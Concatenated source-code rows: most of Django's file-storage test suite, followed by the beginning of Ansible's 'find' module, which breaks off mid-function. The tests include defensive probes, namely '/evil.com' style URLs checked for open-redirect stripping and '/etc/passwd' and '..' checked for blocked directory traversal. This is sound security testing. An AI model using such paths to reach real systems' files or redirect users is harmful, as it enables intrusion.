atime = self.storage.get_accessed_time(f_name)
self.assertEqual(atime, datetime.fromtimestamp(os.path.getatime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_accessed_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_accessed_time_timezone(self):
self._test_file_time_getter(self.storage.get_accessed_time)
@ignore_warnings(category=RemovedInDjango20Warning)
def test_file_accessed_time(self):
"""
File storage returns a datetime for the last accessed time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
atime = self.storage.accessed_time(f_name)
self.assertEqual(atime, datetime.fromtimestamp(os.path.getatime(self.storage.path(f_name))))
self.assertLess(datetime.now() - self.storage.accessed_time(f_name), timedelta(seconds=2))
def test_file_get_created_time(self):
"""
File storage returns a datetime for the creation time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
ctime = self.storage.get_created_time(f_name)
self.assertEqual(ctime, datetime.fromtimestamp(os.path.getctime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_created_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_created_time_timezone(self):
self._test_file_time_getter(self.storage.get_created_time)
@ignore_warnings(category=RemovedInDjango20Warning)
def test_file_created_time(self):
"""
File storage returns a datetime for the creation time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
ctime = self.storage.created_time(f_name)
self.addCleanup(self.storage.delete, f_name)
self.assertEqual(ctime, datetime.fromtimestamp(os.path.getctime(self.storage.path(f_name))))
self.assertLess(datetime.now() - self.storage.created_time(f_name), timedelta(seconds=2))
def test_file_get_modified_time(self):
"""
File storage returns a datetime for the last modified time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
mtime = self.storage.get_modified_time(f_name)
self.assertEqual(mtime, datetime.fromtimestamp(os.path.getmtime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_modified_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_modified_time_timezone(self):
self._test_file_time_getter(self.storage.get_modified_time)
@ignore_warnings(category=RemovedInDjango20Warning)
def test_file_modified_time(self):
"""
File storage returns a datetime for the last modified time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
mtime = self.storage.modified_time(f_name)
self.assertEqual(mtime, datetime.fromtimestamp(os.path.getmtime(self.storage.path(f_name))))
self.assertLess(datetime.now() - self.storage.modified_time(f_name), timedelta(seconds=2))
def test_file_save_without_name(self):
"""
File storage extracts the filename from the content object if no
name is given explicitly.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f.name = 'test.file'
storage_f_name = self.storage.save(None, f)
self.assertEqual(storage_f_name, f.name)
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))
self.storage.delete(storage_f_name)
def test_file_save_with_path(self):
"""
Saving a pathname should create intermediate directories as necessary.
"""
self.assertFalse(self.storage.exists('path/to'))
self.storage.save('path/to/test.file', ContentFile('file saved with path'))
self.assertTrue(self.storage.exists('path/to'))
with self.storage.open('path/to/test.file') as f:
self.assertEqual(f.read(), b'file saved with path')
self.assertTrue(os.path.exists(
os.path.join(self.temp_dir, 'path', 'to', 'test.file')))
self.storage.delete('path/to/test.file')
def test_save_doesnt_close(self):
with TemporaryUploadedFile('test', 'text/plain', 1, 'utf8') as file:
file.write(b'1')
file.seek(0)
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
file = InMemoryUploadedFile(six.StringIO('1'), '', 'test', 'text/plain', 1, 'utf8')
with file:
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
def test_file_path(self):
"""
File storage returns the full path of a file
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assertEqual(self.storage.path(f_name), os.path.join(self.temp_dir, f_name))
self.storage.delete(f_name)
def test_file_url(self):
"""
File storage returns a url to access a given file from the Web.
"""
self.assertEqual(self.storage.url('test.file'), self.storage.base_url + 'test.file')
# should encode special chars except ~!*()'
# like encodeURIComponent() JavaScript function do
self.assertEqual(
self.storage.url(r"~!*()'@#$%^&*abc`+ =.file"),
"/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file"
)
self.assertEqual(self.storage.url("ab\0c"), "/test_media_url/ab%00c")
# should translate os path separator(s) to the url path separator
self.assertEqual(self.storage.url("""a/b\\c.file"""), "/test_media_url/a/b/c.file")
# #25905: remove leading slashes from file names to prevent unsafe url output
self.assertEqual(self.storage.url("/evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url("///evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\\\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(None), "/test_media_url/")
def test_base_url(self):
"""
File storage returns a url even when its base_url is unset or modified.
"""
self.storage.base_url = None
with self.assertRaises(ValueError):
self.storage.url('test.file')
# #22717: missing ending slash in base_url should be auto-corrected
storage = self.storage_class(location=self.temp_dir, base_url='/no_ending_slash')
self.assertEqual(
storage.url('test.file'),
'%s%s' % (storage.base_url, 'test.file')
)
def test_listdir(self):
"""
File storage returns a tuple containing directories and files.
"""
self.assertFalse(self.storage.exists('storage_test_1'))
self.assertFalse(self.storage.exists('storage_test_2'))
self.assertFalse(self.storage.exists('storage_dir_1'))
self.storage.save('storage_test_1', ContentFile('custom content'))
self.storage.save('storage_test_2', ContentFile('custom content'))
os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
dirs, files = self.storage.listdir('')
self.assertEqual(set(dirs), {'storage_dir_1'})
self.assertEqual(set(files), {'storage_test_1', 'storage_test_2'})
self.storage.delete('storage_test_1')
self.storage.delete('storage_test_2')
os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))
def test_file_storage_prevents_directory_traversal(self):
"""
File storage prevents directory traversal (files can only be accessed if
they're below the storage location).
"""
with self.assertRaises(SuspiciousOperation):
self.storage.exists('..')
with self.assertRaises(SuspiciousOperation):
self.storage.exists('/etc/passwd')
def test_file_storage_preserves_filename_case(self):
"""The storage backend should preserve case of filenames."""
# Create a storage backend associated with the mixed case name
# directory.
other_temp_storage = self.storage_class(location=self.temp_dir2)
# Ask that storage backend to store a file with a mixed case filename.
mixed_case = 'CaSe_SeNsItIvE'
file = other_temp_storage.open(mixed_case, 'w')
file.write('storage contents')
file.close()
self.assertEqual(os.path.join(self.temp_dir2, mixed_case), other_temp_storage.path(mixed_case))
other_temp_storage.delete(mixed_case)
def test_makedirs_race_handling(self):
"""
File storage should be robust against directory creation race conditions.
"""
real_makedirs = os.makedirs
# Monkey-patch os.makedirs, to simulate a normal call, a raced call,
# and an error.
def fake_makedirs(path):
if path == os.path.join(self.temp_dir, 'normal'):
real_makedirs(path)
elif path == os.path.join(self.temp_dir, 'raced'):
real_makedirs(path)
raise OSError(errno.EEXIST, 'simulated EEXIST')
elif path == os.path.join(self.temp_dir, 'error'):
raise OSError(errno.EACCES, 'simulated EACCES')
else:
self.fail('unexpected argument %r' % path)
try:
os.makedirs = fake_makedirs
self.storage.save('normal/test.file', ContentFile('saved normally'))
with self.storage.open('normal/test.file') as f:
self.assertEqual(f.read(), b'saved normally')
self.storage.save('raced/test.file', ContentFile('saved with race'))
with self.storage.open('raced/test.file') as f:
self.assertEqual(f.read(), b'saved with race')
# OSErrors aside from EEXIST are still raised.
with self.assertRaises(OSError):
self.storage.save('error/test.file', ContentFile('not saved'))
finally:
os.makedirs = real_makedirs
def test_remove_race_handling(self):
"""
File storage should be robust against file removal race conditions.
"""
real_remove = os.remove
# Monkey-patch os.remove, to simulate a normal call, a raced call,
# and an error.
def fake_remove(path):
if path == os.path.join(self.temp_dir, 'normal.file'):
real_remove(path)
elif path == os.path.join(self.temp_dir, 'raced.file'):
real_remove(path)
raise OSError(errno.ENOENT, 'simulated ENOENT')
elif path == os.path.join(self.temp_dir, 'error.file'):
raise OSError(errno.EACCES, 'simulated EACCES')
else:
self.fail('unexpected argument %r' % path)
try:
os.remove = fake_remove
self.storage.save('normal.file', ContentFile('delete normally'))
self.storage.delete('normal.file')
self.assertFalse(self.storage.exists('normal.file'))
self.storage.save('raced.file', ContentFile('delete with race'))
self.storage.delete('raced.file')
self.assertFalse(self.storage.exists('normal.file'))
# OSErrors aside from ENOENT are still raised.
self.storage.save('error.file', ContentFile('delete with error'))
with self.assertRaises(OSError):
self.storage.delete('error.file')
finally:
os.remove = real_remove
def test_file_chunks_error(self):
"""
Test behavior when file.chunks() is raising an error
"""
f1 = ContentFile('chunks fails')
def failing_chunks():
raise IOError
f1.chunks = failing_chunks
with self.assertRaises(IOError):
self.storage.save('error.file', f1)
def test_delete_no_name(self):
"""
Calling delete with an empty name should not try to remove the base
storage directory, but fail loudly (#20660).
"""
with self.assertRaises(AssertionError):
self.storage.delete('')
@override_settings(
MEDIA_ROOT='media_root',
MEDIA_URL='media_url/',
FILE_UPLOAD_PERMISSIONS=0o777,
FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o777,
)
def test_setting_changed(self):
"""
Properties using settings values as defaults should be updated on
referenced settings change while specified values should be unchanged.
"""
storage = self.storage_class(
location='explicit_location',
base_url='explicit_base_url/',
file_permissions_mode=0o666,
directory_permissions_mode=0o666,
)
defaults_storage = self.storage_class()
settings = {
'MEDIA_ROOT': 'overriden_media_root',
'MEDIA_URL': 'overriden_media_url/',
'FILE_UPLOAD_PERMISSIONS': 0o333,
'FILE_UPLOAD_DIRECTORY_PERMISSIONS': 0o333,
}
with self.settings(**settings):
self.assertEqual(storage.base_location, 'explicit_location')
self.assertIn('explicit_location', storage.location)
self.assertEqual(storage.base_url, 'explicit_base_url/')
self.assertEqual(storage.file_permissions_mode, 0o666)
self.assertEqual(storage.directory_permissions_mode, 0o666)
self.assertEqual(defaults_storage.base_location, settings['MEDIA_ROOT'])
self.assertIn(settings['MEDIA_ROOT'], defaults_storage.location)
self.assertEqual(defaults_storage.base_url, settings['MEDIA_URL'])
self.assertEqual(defaults_storage.file_permissions_mode, settings['FILE_UPLOAD_PERMISSIONS'])
self.assertEqual(
defaults_storage.directory_permissions_mode, settings['FILE_UPLOAD_DIRECTORY_PERMISSIONS']
)
class CustomStorage(FileSystemStorage):
def get_available_name(self, name, max_length=None):
"""
Append numbers to duplicate files rather than underscores, like Trac.
"""
parts = name.split('.')
basename, ext = parts[0], parts[1:]
number = 2
while self.exists(name):
name = '.'.join([basename, str(number)] + ext)
number += 1
return name
class CustomStorageTests(FileStorageTests):
storage_class = CustomStorage
def test_custom_get_available_name(self):
first = self.storage.save('custom_storage', ContentFile('custom contents'))
self.assertEqual(first, 'custom_storage')
second = self.storage.save('custom_storage', ContentFile('more contents'))
self.assertEqual(second, 'custom_storage.2')
self.storage.delete(first)
self.storage.delete(second)
class CustomStorageLegacyDatetimeHandling(FileSystemStorage):
# Use the legacy accessed_time() et al from FileSystemStorage and the
# shim get_accessed_time() et al from the Storage baseclass. Both of those
# raise warnings, so the testcase class ignores them all.
def get_accessed_time(self, name):
return super(FileSystemStorage, self).get_accessed_time(name)
def get_created_time(self, name):
return super(FileSystemStorage, self).get_created_time(name)
def get_modified_time(self, name):
return super(FileSystemStorage, self).get_modified_time(name)
@ignore_warnings(category=RemovedInDjango20Warning)
class CustomStorageLegacyDatetimeHandlingTests(FileStorageTests):
storage_class = CustomStorageLegacyDatetimeHandling
class DiscardingFalseContentStorage(FileSystemStorage):
def _save(self, name, content):
if content:
return super(DiscardingFalseContentStorage, self)._save(name, content)
return ''
class DiscardingFalseContentStorageTests(FileStorageTests):
storage_class = DiscardingFalseContentStorage
def test_custom_storage_discarding_empty_content(self):
"""
When Storage.save() wraps a file-like object in File, it should include
the name argument so that bool(file) evaluates to True (#26495).
"""
output = six.StringIO('content')
self.storage.save('tests/stringio', output)
self.assertTrue(self.storage.exists('tests/stringio'))
with self.storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
class FileFieldStorageTests(TestCase):
def tearDown(self):
shutil.rmtree(temp_storage_location)
def _storage_max_filename_length(self, storage):
"""
Query filesystem for maximum filename length (e.g. AUFS has 242).
"""
dir_to_test = storage.location
while not os.path.exists(dir_to_test):
dir_to_test = os.path.dirname(dir_to_test)
try:
return os.pathconf(dir_to_test, 'PC_NAME_MAX')
except Exception:
return 255 # Should be safe on most backends
def test_files(self):
self.assertIsInstance(Storage.normal, FileDescriptor)
# An object without a file has limited functionality.
obj1 = Storage()
self.assertEqual(obj1.normal.name, "")
with self.assertRaises(ValueError):
obj1.normal.size
# Saving a file enables full functionality.
obj1.normal.save("django_test.txt", ContentFile("content"))
self.assertEqual(obj1.normal.name, "tests/django_test.txt")
self.assertEqual(obj1.normal.size, 7)
self.assertEqual(obj1.normal.read(), b"content")
obj1.normal.close()
# File objects can be assigned to FileField attributes, but shouldn't
# get committed until the model it's attached to is saved.
obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
dirs, files = temp_storage.listdir("tests")
self.assertEqual(dirs, [])
self.assertNotIn("assignment.txt", files)
obj1.save()
dirs, files = temp_storage.listdir("tests")
self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])
# Save another file with the same name.
obj2 = Storage()
obj2.normal.save("django_test.txt", ContentFile("more content"))
obj2_name = obj2.normal.name
six.assertRegex(self, obj2_name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
self.assertEqual(obj2.normal.size, 12)
obj2.normal.close()
# Deleting an object does not delete the file it uses.
obj2.delete()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertNotEqual(obj2_name, obj2.normal.name)
six.assertRegex(self, obj2.normal.name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
obj2.normal.close()
def test_filefield_read(self):
# Files can be read in a little at a time, if necessary.
obj = Storage.objects.create(
normal=SimpleUploadedFile("assignment.txt", b"content"))
obj.normal.open()
self.assertEqual(obj.normal.read(3), b"con")
self.assertEqual(obj.normal.read(), b"tent")
self.assertEqual(list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"])
obj.normal.close()
def test_filefield_write(self):
# Files can be written to.
obj = Storage.objects.create(normal=SimpleUploadedFile('rewritten.txt', b'content'))
with obj.normal as normal:
normal.open('wb')
normal.write(b'updated')
obj.refresh_from_db()
self.assertEqual(obj.normal.read(), b'updated')
obj.normal.close()
def test_filefield_reopen(self):
obj = Storage.objects.create(normal=SimpleUploadedFile('reopen.txt', b'content'))
with obj.normal as normal:
normal.open()
obj.normal.open()
obj.normal.file.seek(0)
obj.normal.close()
def test_duplicate_filename(self):
# Multiple files with the same name get _(7 random chars) appended to them.
objs = [Storage() for i in range(2)]
for o in objs:
o.normal.save("multiple_files.txt", ContentFile("Same Content"))
try:
names = [o.normal.name for o in objs]
self.assertEqual(names[0], "tests/multiple_files.txt")
six.assertRegex(self, names[1], "tests/multiple_files_%s.txt" % FILE_SUFFIX_REGEX)
finally:
for o in objs:
o.delete()
def test_file_truncation(self):
# Given the max_length is limited, when multiple files get uploaded
# under the same name, then the filename get truncated in order to fit
# in _(7 random chars). When most of the max_length is taken by
# dirname + extension and there are not enough characters in the
# filename to truncate, an exception should be raised.
objs = [Storage() for i in range(2)]
filename = 'filename.ext'
for o in objs:
o.limited_length.save(filename, ContentFile('Same Content'))
try:
# Testing truncation.
names = [o.limited_length.name for o in objs]
self.assertEqual(names[0], 'tests/%s' % filename)
six.assertRegex(self, names[1], 'tests/fi_%s.ext' % FILE_SUFFIX_REGEX)
# Testing exception is raised when filename is too short to truncate.
filename = 'short.longext'
objs[0].limited_length.save(filename, ContentFile('Same Content'))
with self.assertRaisesMessage(SuspiciousFileOperation, 'Storage can not find an available filename'):
objs[1].limited_length.save(*(filename, ContentFile('Same Content')))
finally:
for o in objs:
o.delete()
@unittest.skipIf(
sys.platform.startswith('win'),
"Windows supports at most 260 characters in a path.",
)
def test_extended_length_storage(self):
# Testing FileField with max_length > 255. Most systems have filename
# length limitation of 255. Path takes extra chars.
filename = (self._storage_max_filename_length(temp_storage) - 4) * 'a' # 4 chars for extension.
obj = Storage()
obj.extended_length.save('%s.txt' % filename, ContentFile('Same Content'))
self.assertEqual(obj.extended_length.name, 'tests/%s.txt' % filename)
self.assertEqual(obj.extended_length.read(), b'Same Content')
obj.extended_length.close()
def test_filefield_default(self):
# Default values allow an object to access a single file.
temp_storage.save('tests/default.txt', ContentFile('default content'))
obj = Storage.objects.create()
self.assertEqual(obj.default.name, "tests/default.txt")
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
# But it shouldn't be deleted, even if there are no more objects using
# it.
obj.delete()
obj = Storage()
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
def test_empty_upload_to(self):
# upload_to can be empty, meaning it does not use subdirectory.
obj = Storage()
obj.empty.save('django_test.txt', ContentFile('more content'))
self.assertEqual(obj.empty.name, "django_test.txt")
self.assertEqual(obj.empty.read(), b"more content")
obj.empty.close()
def test_random_upload_to(self):
# Verify the fix for #5655, making sure the directory is only
# determined once.
obj = Storage()
obj.random.save("random_file", ContentFile("random content"))
self.assertTrue(obj.random.name.endswith("/random_file"))
obj.random.close()
def test_custom_valid_name_callable_upload_to(self):
"""
Storage.get_valid_name() should be called when upload_to is a callable.
"""
obj = Storage()
obj.custom_valid_name.save("random_file", ContentFile("random content"))
# CustomValidNameStorage.get_valid_name() appends '_valid' to the name
self.assertTrue(obj.custom_valid_name.name.endswith("/random_file_valid"))
obj.custom_valid_name.close()
def test_filefield_pickling(self):
# Push an object into the cache to make sure it pickles properly
obj = Storage()
obj.normal.save("django_test.txt", ContentFile("more content"))
obj.normal.close()
cache.set("obj", obj)
self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")
def test_file_object(self):
# Create sample file
temp_storage.save('tests/example.txt', ContentFile('some content'))
# Load it as python file object
with open(temp_storage.path('tests/example.txt')) as file_obj:
# Save it using storage and read its content
temp_storage.save('tests/file_obj', file_obj)
self.assertTrue(temp_storage.exists('tests/file_obj'))
with temp_storage.open('tests/file_obj') as f:
self.assertEqual(f.read(), b'some content')
def test_stringio(self):
# Test passing StringIO instance as content argument to save
output = six.StringIO()
output.write('content')
output.seek(0)
# Save it and read written file
temp_storage.save('tests/stringio', output)
self.assertTrue(temp_storage.exists('tests/stringio'))
with temp_storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
def chunks(self):
time.sleep(1)
return super(ContentFile, self).chunks()
class FileSaveRaceConditionTest(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
self.thread = threading.Thread(target=self.save_file, args=['conflict'])
def tearDown(self):
shutil.rmtree(self.storage_dir)
def save_file(self, name):
name = self.storage.save(name, SlowFile(b"Data"))
def test_race_condition(self):
self.thread.start()
self.save_file('conflict')
self.thread.join()
files = sorted(os.listdir(self.storage_dir))
self.assertEqual(files[0], 'conflict')
six.assertRegex(self, files[1], 'conflict_%s' % FILE_SUFFIX_REGEX)
@unittest.skipIf(sys.platform.startswith('win'), "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
def setUp(self):
self.umask = 0o027
self.old_umask = os.umask(self.umask)
self.storage_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.storage_dir)
os.umask(self.old_umask)
@override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
def test_file_upload_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_file", ContentFile("data"))
actual_mode = os.stat(self.storage.path(name))[0] & 0o777
self.assertEqual(actual_mode, 0o654)
@override_settings(FILE_UPLOAD_PERMISSIONS=None)
def test_file_upload_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
fname = self.storage.save("some_file", ContentFile("data"))
mode = os.stat(self.storage.path(fname))[0] & 0o777
self.assertEqual(mode, 0o666 & ~self.umask)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
def test_file_upload_directory_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o765)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
def test_file_upload_directory_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o777 & ~self.umask)
class FileStoragePathParsing(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_directory_with_dot(self):
"""Regression test for #9610.
If the directory name contains a dot and the file name doesn't, make
sure we still mangle the file name instead of the directory name.
"""
self.storage.save('dotted.path/test', ContentFile("1"))
self.storage.save('dotted.path/test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], 'test')
six.assertRegex(self, files[1], 'test_%s' % FILE_SUFFIX_REGEX)
def test_first_character_dot(self):
"""
File names with a dot as their first character don't have an extension,
and the underscore should get added to the end.
"""
self.storage.save('dotted.path/.test', ContentFile("1"))
self.storage.save('dotted.path/.test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], '.test')
six.assertRegex(self, files[1], '.test_%s' % FILE_SUFFIX_REGEX)
class ContentFileStorageTestCase(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_content_saving(self):
"""
ContentFile can be saved correctly with the filesystem storage,
if it was initialized with either bytes or unicode content.
"""
self.storage.save('bytes.txt', ContentFile(b"content"))
self.storage.save('unicode.txt', ContentFile("español"))
@override_settings(ROOT_URLCONF='file_storage.urls')
class FileLikeObjectTestCase(LiveServerTestCase):
"""
Test file-like objects (#15644).
"""
available_apps = []
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(location=self.temp_dir)
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_urllib2_urlopen(self):
"""
Test the File storage API with a file like object coming from urllib2.urlopen()
"""
file_like_object = urlopen(self.live_server_url + '/')
f = File(file_like_object)
stored_filename = self.storage.save("remote_file.html", f)
remote_file = urlopen(self.live_server_url + '/')
with self.storage.open(stored_filename) as stored_file:
self.assertEqual(stored_file.read(), remote_file.read())
| bsd-3-clause |
halberom/ansible | lib/ansible/modules/files/find.py | 19 | 13484 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2014, Ruggero Marchei <ruggero.marchei@daemonzone.net>
# (c) 2015, Brian Coca <bcoca@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>
ANSIBLE_METADATA = {'status': ['stableinterface'],
'supported_by': 'core',
'version': '1.0'}
DOCUMENTATION = '''
---
module: find
author: Brian Coca (based on Ruggero Marchei's Tidy)
version_added: "2.0"
short_description: return a list of files based on specific criteria
requirements: []
description:
- Return a list of files based on specific criteria. Multiple criteria are AND'd together.
options:
age:
required: false
default: null
description:
- Select files whose age is equal to or greater than the specified time.
Use a negative age to find files equal to or less than the specified time.
You can choose seconds, minutes, hours, days, or weeks by specifying the
first letter of any of those words (e.g., "1w").
patterns:
required: false
default: '*'
description:
- One or more (shell or regex) patterns, which type is controlled by C(use_regex) option.
- The patterns restrict the list of files to be returned to those whose basenames match at
least one of the patterns specified. Multiple patterns can be specified using a list.
aliases: ['pattern']
contains:
required: false
default: null
description:
- One or more regex patterns which should be matched against the file content
paths:
required: true
aliases: [ "name", "path" ]
description:
- List of paths of directories to search. All paths must be fully qualified.
file_type:
required: false
description:
- Type of file to select
- The 'link' and 'any' choices were added in version 2.3
choices: [ "file", "directory", "link", "any" ]
default: "file"
recurse:
required: false
default: "no"
choices: [ "yes", "no" ]
description:
- If target is a directory, recursively descend into the directory looking for files.
size:
required: false
default: null
description:
- Select files whose size is equal to or greater than the specified size.
Use a negative size to find files equal to or less than the specified size.
Unqualified values are in bytes, but b, k, m, g, and t can be appended to specify
bytes, kilobytes, megabytes, gigabytes, and terabytes, respectively.
Size is not evaluated for directories.
age_stamp:
required: false
default: "mtime"
choices: [ "atime", "mtime", "ctime" ]
description:
- Choose the file property against which we compare age. Default is mtime.
hidden:
required: false
default: "False"
choices: [ True, False ]
description:
- Set this to true to include hidden files, otherwise they'll be ignored.
follow:
required: false
default: "False"
choices: [ True, False ]
description:
- Set this to true to follow symlinks in path for systems with python 2.6+
get_checksum:
required: false
default: "False"
choices: [ True, False ]
description:
- Set this to true to retrieve a file's sha1 checksum
use_regex:
required: false
default: "False"
choices: [ True, False ]
description:
- If false the patterns are file globs (shell) if true they are python regexes
'''
EXAMPLES = r'''
# Recursively find /tmp files older than 2 days
- find:
paths: "/tmp"
age: "2d"
recurse: yes
# Recursively find /tmp files older than 4 weeks and equal or greater than 1 megabyte
- find:
paths: "/tmp"
age: "4w"
size: "1m"
recurse: yes
# Recursively find /var/tmp files with last access time greater than 3600 seconds
- find:
paths: "/var/tmp"
age: "3600"
age_stamp: atime
recurse: yes
# find /var/log files equal or greater than 10 megabytes ending with .old or .log.gz
- find:
paths: "/var/tmp"
patterns: "*.old,*.log.gz"
size: "10m"
# find /var/log files equal or greater than 10 megabytes ending with .old or .log.gz via regex
# Note that yaml double quotes require escaping backslashes but yaml single
# quotes do not.
- find:
paths: "/var/tmp"
patterns: "^.*?\\.(?:old|log\\.gz)$"
size: "10m"
use_regex: True
'''
RETURN = '''
files:
description: all matches found with the specified criteria (see stat module for full output of each dictionary)
returned: success
type: list of dictionaries
sample: [
{ path: "/var/tmp/test1",
mode: "0644",
"...": "...",
checksum: 16fac7be61a6e4591a33ef4b729c5c3302307523
},
{ path: "/var/tmp/test2",
"...": "..."
},
]
matched:
description: number of matches
returned: success
type: string
sample: 14
examined:
description: number of filesystem objects looked at
returned: success
type: string
sample: 34
'''
import os
import stat
import fnmatch
import time
import re
def pfilter(f, patterns=None, use_regex=False):
'''filter using glob patterns'''
if patterns is None:
return True
if use_regex:
for p in patterns:
r = re.compile(p)
if r.match(f):
return True
else:
for p in patterns:
if fnmatch.fnmatch(f, p):
return True
return False
def agefilter(st, now, age, timestamp):
'''filter files older than age'''
if age is None or \
(age >= 0 and now - st.__getattribute__("st_%s" % timestamp) >= abs(age)) or \
(age < 0 and now - st.__getattribute__("st_%s" % timestamp) <= abs(age)):
return True
return False
def sizefilter(st, size):
'''filter files greater than size'''
if size is None or \
(size >= 0 and st.st_size >= abs(size)) or \
(size < 0 and st.st_size <= abs(size)):
return True
return False
def contentfilter(fsname, pattern):
'''filter files which contain the given expression'''
if pattern is None:
return True
try:
f = open(fsname)
prog = re.compile(pattern)
for line in f:
if prog.match (line):
f.close()
return True
f.close()
except:
pass
return False
def statinfo(st):
return {
'mode' : "%04o" % stat.S_IMODE(st.st_mode),
'isdir' : stat.S_ISDIR(st.st_mode),
'ischr' : stat.S_ISCHR(st.st_mode),
'isblk' : stat.S_ISBLK(st.st_mode),
'isreg' : stat.S_ISREG(st.st_mode),
'isfifo' : stat.S_ISFIFO(st.st_mode),
'islnk' : stat.S_ISLNK(st.st_mode),
'issock' : stat.S_ISSOCK(st.st_mode),
'uid' : st.st_uid,
'gid' : st.st_gid,
'size' : st.st_size,
'inode' : st.st_ino,
'dev' : st.st_dev,
'nlink' : st.st_nlink,
'atime' : st.st_atime,
'mtime' : st.st_mtime,
'ctime' : st.st_ctime,
'wusr' : bool(st.st_mode & stat.S_IWUSR),
'rusr' : bool(st.st_mode & stat.S_IRUSR),
'xusr' : bool(st.st_mode & stat.S_IXUSR),
'wgrp' : bool(st.st_mode & stat.S_IWGRP),
'rgrp' : bool(st.st_mode & stat.S_IRGRP),
'xgrp' : bool(st.st_mode & stat.S_IXGRP),
'woth' : bool(st.st_mode & stat.S_IWOTH),
'roth' : bool(st.st_mode & stat.S_IROTH),
'xoth' : bool(st.st_mode & stat.S_IXOTH),
'isuid' : bool(st.st_mode & stat.S_ISUID),
'isgid' : bool(st.st_mode & stat.S_ISGID),
}
def main():
module = AnsibleModule(
argument_spec = dict(
paths = dict(required=True, aliases=['name','path'], type='list'),
patterns = dict(default=['*'], type='list', aliases=['pattern']),
